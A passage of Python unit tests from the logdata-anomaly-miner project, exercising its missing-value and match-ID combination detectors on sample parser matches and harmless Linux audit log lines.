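        output_stream, match_context, decimal_integer_value_me, sequence_model_element, writer = self._setup(
            "Test4MatchValueStreamWriter", b'25537Euro 25538Euro 25539Euro 25540Pfund ', b';', b'-')
        for _ in range(3):
            self._write(writer, match_context, sequence_model_element)
        self._write(writer, match_context, decimal_integer_value_me, self.match_sequence_d1)
        self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;-\n')


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MissingMatchPathValueDetectorTest.py000066400000000000000000000732511437606560100327210ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector, MissingMatchPathListValueDetector import time from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from unit.TestBase import TestBase from datetime import datetime, timezone class MissingMatchPathValueDetectorTest(TestBase): """Unittests for the MissingMatchPathValueDetector.""" __expected_string = '%s Interval too large between values\n%s: "%s" (%d lines)\n %s\n\n' __default_interval = 3600 __realert_interval = 86400 pid = b' pid=' datetime_format_string = '%Y-%m-%d %H:%M:%S' match1_s1_overdue = "['match1/s1']: \"[' pid=']\" overdue 400s (interval -400)" string = b'25537 uid=2' def test1_receive_atom(self): """This test case checks whether a missing value is created without using the learn_mode (should not be the case).""" description = "Test1MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme =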
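fixed_dme.get_match_element("match1", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), 1, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme))

    def _pid_match(self, fixed_dme, path):
        """Match `fixed_dme` against a fresh MatchContext holding self.pid and return the match element rooted at `path`."""
        return fixed_dme.get_match_element(path, MatchContext(self.pid))

    def _new_detector(self, path, learn_mode, default_interval, **kwargs):
        """Create a MissingMatchPathValueDetector watching `path` with the class-wide realert interval.

        The boolean position is what the test docstrings call learn_mode; `kwargs` are forwarded unchanged
        (the tests use output_logline). The caller registers the detector where the test requires it.
        """
        return MissingMatchPathValueDetector(
            self.aminer_config, [path], [self.stream_printer_event_handler], 'Default', learn_mode, default_interval,
            self.__realert_interval, **kwargs)

    def _expected_report(self, timestamp, detector, description):
        """Render the "Interval too large between values" event expected for one overdue match1/s1 value at `timestamp`."""
        return self.__expected_string % (
            datetime.fromtimestamp(timestamp).strftime(self.datetime_format_string), detector.__class__.__name__,
            description, 1, self.match1_s1_overdue)

    def test2_receive_atom_without_match_element(self):
        """receive_atom must return False when the atom's match lives under a path the detector does not watch."""
        description = "Test2MissingMatchPathValueDetector"
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element_fixed_dme = self._pid_match(fixed_dme, "match1")
        match_element_fixed_dme2 = self._pid_match(fixed_dme, "match2")
        detector = self._new_detector(match_element_fixed_dme.get_path(), False, self.__default_interval)
        self.analysis_context.register_component(detector, description)
        # The detector watches match1/s1 but the atom only carries match2/s1.
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme2), 1, detector)
        self.assertFalse(detector.receive_atom(log_atom_fixed_dme))

    def test3_receive_atom_no_missing_value(self):
        """No false positive may be reported while the time limit has not been passed."""
        description = "Test3MissingMatchPathValueDetector"
        t = time.time()
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element_fixed_dme = self._pid_match(fixed_dme, "match1")
        detector = self._new_detector(match_element_fixed_dme.get_path(), True, self.__default_interval)
        self.analysis_context.register_component(detector, description)
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, detector)
        self.assertTrue(detector.receive_atom(log_atom_fixed_dme))
        past_time = 3200
        # A fresh, unregistered detector with the interval shortened by past_time receives the later atom.
        detector = self._new_detector(match_element_fixed_dme.get_path(), True, detector.default_interval - past_time)
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t + past_time, detector)
        self.assertTrue(detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), '')

    def test4_receive_atom_missing_value(self):
        """A value arriving past the interval must be reported as overdue."""
        description = "Test4MissingMatchPathValueDetector"
        t = time.time()
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element_fixed_dme = self._pid_match(fixed_dme, "match1")
        detector = self._new_detector(match_element_fixed_dme.get_path(), True, self.__default_interval)
        self.analysis_context.register_component(detector, description)
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, detector)
        self.assertTrue(detector.receive_atom(log_atom_fixed_dme))
        past_time = 4000
        # Second detector: interval shortened by past_time (yielding the "-400" in match1_s1_overdue), log line output off.
        detector = self._new_detector(
            match_element_fixed_dme.get_path(), True, detector.default_interval - past_time, output_logline=False)
        self.analysis_context.register_component(detector, description + "2")
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t + past_time, detector)
        self.assertTrue(detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), self._expected_report(t + past_time, detector, description + "2"))

    def test5_missing_value_on_persisted(self):
        """Persisting the state of one detector and checking the overdue value with another instance."""
        description = "Test5MissingMatchPathValueDetector"
        t = time.time()
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element_fixed_dme = self._pid_match(fixed_dme, "match1")
        detector = self._new_detector(match_element_fixed_dme.get_path(), True, self.__default_interval)
        self.analysis_context.register_component(detector, description)
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), detector)
        self.assertTrue(detector.receive_atom(log_atom_fixed_dme))
        detector.do_persist()
        past_time = 4000
        other_detector = self._new_detector(match_element_fixed_dme.get_path(), True, self.__default_interval)
        self.analysis_context.register_component(other_detector, description + "2")
        other_detector.last_seen_timestamp = t + past_time
        # The channel key is taken from the first atom; the check value uses the shortened interval.
        other_detector.set_check_value(
            other_detector.get_channel_key(log_atom_fixed_dme)[1], self.__default_interval - past_time,
            [match_element_fixed_dme.get_path()])
        log_atom_fixed_dme = LogAtom(
            fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, other_detector)
        self.assertTrue(other_detector.receive_atom(log_atom_fixed_dme))
        # Either report timestamp is accepted, presumably because round(t) can exceed t by up to one second.
        self.assertIn(self.output_stream.getvalue(), (
            self._expected_report(t + past_time, other_detector, description + "2"),
            self._expected_report(t + past_time + 1, other_detector, description + "2")))

    def test6_receive_atom_list(self):
        """A MissingMatchPathListValueDetector over two paths accepts an atom matching the first of them without learn_mode."""
        description = "Test6MissingMatchPathValueDetector"
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element_fixed_dme = self._pid_match(fixed_dme, "match1")
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element(
            "match2", MatchContext(self.string))
        list_detector = MissingMatchPathListValueDetector(
            self.aminer_config, [match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()],
            [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval)
        self.analysis_context.register_component(list_detector, description)
        log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), 1, list_detector)
        self.assertTrue(list_detector.receive_atom(log_atom_fixed_dme))

    def test7_receive_atom_list_without_match_element(self): """This test case checks if the ReceiveAtom controls the list of MatchElements and responds correctly, when a value is missing.""" description = "Test7MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) match_context_fixed_dme = MatchContext(self.pid) matchElementFixedDME2 = fixed_dme.get_match_element("match3", match_context_fixed_dme) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval)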
self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(matchElementFixedDME2), 1, missing_match_path_list_value_detector) self.assertFalse(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) def test8_receive_atom_list_no_missing_value(self): """This test case checks whether the class returns wrong positives on lists, when the time limit should not be passed.""" description = "Test8MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 3200 missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, 
missing_match_path_list_value_detector.default_interval - past_time, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description + "2") log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), '') def test9_receive_atom_list_missing_value(self): """This test case checks if missing values are reported correctly.""" description = "Test90MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 4000 missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), 
match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, missing_match_path_list_value_detector.default_interval - past_time, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description + "2") log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) # skipcq: PYL-R1714 self.assertTrue((self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match1/s1, match2/d1: ' pid=' overdue 400s (interval -400)")) or (self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time + 1).strftime(self.datetime_format_string), missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match1/s1, match2/d1: ' pid=' overdue 400s (interval -400)"))) def test10_missing_value_on_persisted(self): """Persisting lists is tested in this test case.""" description = "Test91MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s2', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match3", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d2', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match4", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), 
match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) missing_match_path_list_value_detector.do_persist() past_time = 4000 other_missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(other_missing_match_path_list_value_detector, description + "2") other_missing_match_path_list_value_detector.last_seen_timestamp = t + past_time other_missing_match_path_list_value_detector.set_check_value(other_missing_match_path_list_value_detector.get_channel_key( log_atom_fixed_dme)[1], self.__default_interval - past_time, match_element_fixed_dme.get_path()) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, other_missing_match_path_list_value_detector) self.assertTrue(other_missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) # skipcq: PYL-R1714 self.assertTrue((self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), other_missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match3/s2, match4/d2: ' pid=' overdue 400s (interval -400)")) or (self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time + 1).strftime(self.datetime_format_string), 
other_missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match3/s2, match4/d2: ' pid=' overdue 400s (interval -400)"))) def test11multiple_paths(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths.""" description = "Test11MissingMatchPathValueDetector" match_context = MatchContext(self.pid + b"22") fixed_dme = FixedDataModelElement('s1', self.pid) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) seq = SequenceModelElement('model', [fixed_dme, decimal_integer_value_me]) match_element = seq.get_match_element("match", match_context) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [ "match/model", "match/model/s1", "match/model/d1"], [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom = LogAtom(fixed_dme.fixed_data + b"22", ParserMatch(match_element), 1, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom)) def test12multiple_paths_data_from_file(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths with more data.""" description = "Test12MissingMatchPathValueDetector" with open('unit/data/multiple_pathes_mmpvd.txt', 'rb') as f: data = f.readlines() host1 = FixedDataModelElement("host1", b"host1 ") host2 = FixedDataModelElement("host2", b"host2 ") service1 = FixedDataModelElement("service1", b"service1") service2 = FixedDataModelElement("service2", b"service2") seq11 = SequenceModelElement("seq11", [host1, service1]) seq12 = SequenceModelElement("seq12", [host1, service2]) seq21 = SequenceModelElement("seq21", [host2, service1]) seq22 = SequenceModelElement("seq22", [host2, service2]) first = 
FirstMatchModelElement("first", [seq11, seq12, seq21, seq22]) missing_match_path_value_detector11 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq11", "match/first/seq11/host1", "match/first/seq11/service1"], [self.stream_printer_event_handler], 'Default11', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector11, description+"11") missing_match_path_value_detector12 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq12", "match/first/seq12/host1", "match/first/seq12/service2"], [self.stream_printer_event_handler], 'Default23', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector12, description+"12") missing_match_path_value_detector21 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq21", "match/first/seq21/host2", "match/first/seq21/service1"], [self.stream_printer_event_handler], 'Default21', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector21, description+"21") missing_match_path_value_detector22 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq22", "match/first/seq22/host2", "match/first/seq22/service2"], [self.stream_printer_event_handler], 'Default22', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector22, description+"22") t = 0 for line in data: split_line = line.rsplit(b" ", 2) date = datetime.strptime(split_line[0].decode(), "%Y-%m-%d %H:%M:%S") date = date.astimezone(timezone.utc) t = (date - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() # initialize the detectors and remove the first output. 
if missing_match_path_value_detector11.learn_mode is True: line = b"host1 service1host1 service2host2 service1host2 service2" match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) missing_match_path_value_detector11.receive_atom(log_atom) missing_match_path_value_detector11.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) missing_match_path_value_detector12.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) missing_match_path_value_detector21.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) missing_match_path_value_detector22.learn_mode = False self.reset_output_stream() line = split_line[1] + b" " + split_line[2] match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) res = missing_match_path_value_detector11.receive_atom(log_atom) if match_element.get_path() == "match/first/seq11": self.assertTrue(res) res = missing_match_path_value_detector12.receive_atom(log_atom) if match_element.get_path() == "match/first/seq12": self.assertTrue(res) res = missing_match_path_value_detector21.receive_atom(log_atom) if match_element.get_path() == "match/first/seq21": self.assertTrue(res) res = missing_match_path_value_detector22.receive_atom(log_atom) if 
match_element.get_path() == "match/first/seq22": self.assertTrue(res) # need to produce a valid match to trigger missing match paths. line = b"host1 service1host1 service2host2 service1host2 service2" match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) missing_match_path_value_detector11.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) # exactly one overdue should be found msg = "2021-03-12 21:30:51 Interval too large between values\nMissingMatchPathValueDetector: \"Test12MissingMatchPathValue" \ "Detector11\" (1 lines)\n ['match/first/seq11', 'match/first/seq11/host1', 'match/first/seq11/service1']: \"['host1 " \ "service1', 'host1 ', 'service1']\" overdue 12s (interval 480)\n\n" self.assertEqual(msg, self.output_stream.getvalue()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchIdValueComboDetectorTest.py000066400000000000000000000607461437606560100324700ustar00rootroot00000000000000import time from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import 
SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class NewMatchIdValueComboDetectorTest(TestBase): """Unittests for the NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" 
inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1' b' ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 
suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)'] expected_allowlist_string = "Allowlisted path(es) parser/type/path/name, parser/type/syscall/syscall with %s." 
    # Parser for the two Linux audit record types used by log_lines. Both branches share the
    # "msg=audit(<timestamp>:<id>)" prefix, whose serial number lands under ".../id" and is what the detector
    # under test correlates PATH and SYSCALL records by (see id_path_list in the tests).
    parsing_model = FirstMatchModelElement('type', [
        SequenceModelElement('path', [
            FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'),
            FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'),
            FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'),
            FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '),
            FixedDataModelElement('mode_string', b' mode='),
            # mode is octal-looking with a leading zero, hence the zero-padding type.
            DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO),
            FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'),
            FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'),
